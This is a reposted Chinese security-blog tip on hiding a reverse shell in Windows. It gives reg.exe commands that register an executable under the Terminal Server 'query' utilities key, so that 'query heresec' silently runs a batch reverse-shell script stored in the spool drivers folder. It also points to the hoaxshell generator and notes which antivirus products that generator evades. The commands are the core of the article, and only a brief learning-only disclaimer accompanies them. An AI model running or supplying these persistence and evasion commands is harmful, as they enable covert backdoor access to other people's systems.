小技巧 | 用一条命令来隐藏反向Shell

华盟君华盟君 工具介绍 3 年前
3.75W 0
华盟原创文章投稿奖励计划

小技巧 | 用一条命令来隐藏反向Shell

From:https://www.youtube.com/watch?v=gzv3d7rvjKA

注册表路径: 

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerUtilitiesquery

包含了与终端服务器相关的设置和配置信息。

执行命令query可以查看服务器的一些状态,实际上是执行此项值中的可执行文件。

小技巧 | 用一条命令来隐藏反向Shell

小技巧 | 用一条命令来隐藏反向Shell

添加一条,打开计算器。 

reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminalServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d01hereseccalc.exe

小技巧 | 用一条命令来隐藏反向Shell

这里再介绍一个能够绕过一些AV的Windows反向shell生成器和交互程序。(测试环境用的X绒,可以绕过,经测试不能绕过Windows Defender的AMSI)。 

https://github.com/t3l3machus/hoaxshell

小技巧 | 用一条命令来隐藏反向Shell

将命令写入一个bat脚本中,然后添加注册表后执行。

小技巧 | 用一条命令来隐藏反向Shell 

reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminalServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01heresecC:WindowsSystem32spooldriverscolor1.batquery heresec

只需执行命令query heresec即可运行反弹shell脚本。
小技巧 | 用一条命令来隐藏反向Shell

还能怎么用,再联想一下。

文章来源:关注安全技术

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END

小技巧 | 用一条命令来隐藏反向Shell

本文来源关注安全技术,经授权后由华盟君发布,观点不代表华盟网的立场,转载请联系原作者。
华盟君官方
华盟君

5.57K篇文章 177.57M总阅读量

相关文章

发表回复